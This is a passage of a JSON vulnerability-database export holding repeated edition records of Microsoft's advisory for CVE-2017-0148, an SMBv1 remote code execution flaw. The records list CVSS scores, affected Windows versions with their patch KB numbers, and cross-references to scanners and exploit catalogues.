"KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, 
{"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-17T20:55:04", "differentElements": ["msAffectedSoftware"], "edition": 55}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "47d8cff84559a6e03e5ea58b880c90dc", "type": "mscve", "bulletinFamily": "microsoft", 
"title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-17T22:48:26", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": 
"symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-16T12:44:29", "rev": 2}, "score": {"value": 7.3, 
"vector": "NONE", "modified": "2021-09-16T12:44:29", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBMS16-110, 3187754", "KB4012212", "KB4012215", "KB3210720", "KB4012598", "KB4012213", "KB4013429", "KB3205401", "KB4012606", "KB3213986", "KB3210721", "KB3205409", "KB4013198", "KB4012214", "KB3177186", "KB4012216", "KB3212646", "KB4012217"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for 
x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems 
Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-17T22:48:26", "differentElements": ["msAffectedSoftware"], "edition": 56}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "1455b21b7b338994ddec7ae57c94d0af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-18T00:49:58", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": 
["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-16T12:44:29", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-16T12:44:29", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBMS16-110, 3187754", "KB4012212", "KB4012215", "KB3210720", "KB4012598", "KB4012213", "KB4013429", 
"KB3205401", "KB4012606", "KB3213986", "KB3210721", "KB3205409", "KB4013198", "KB4012214", "KB3177186", "KB4012216", "KB3212646", "KB4012217"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 
(Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": 
""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", 
"kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, 
{"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-18T00:49:58", "differentElements": ["msAffectedSoftware"], "edition": 57}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "47d8cff84559a6e03e5ea58b880c90dc", "type": "mscve", "bulletinFamily": "microsoft", 
"title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-18T02:48:09", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": 
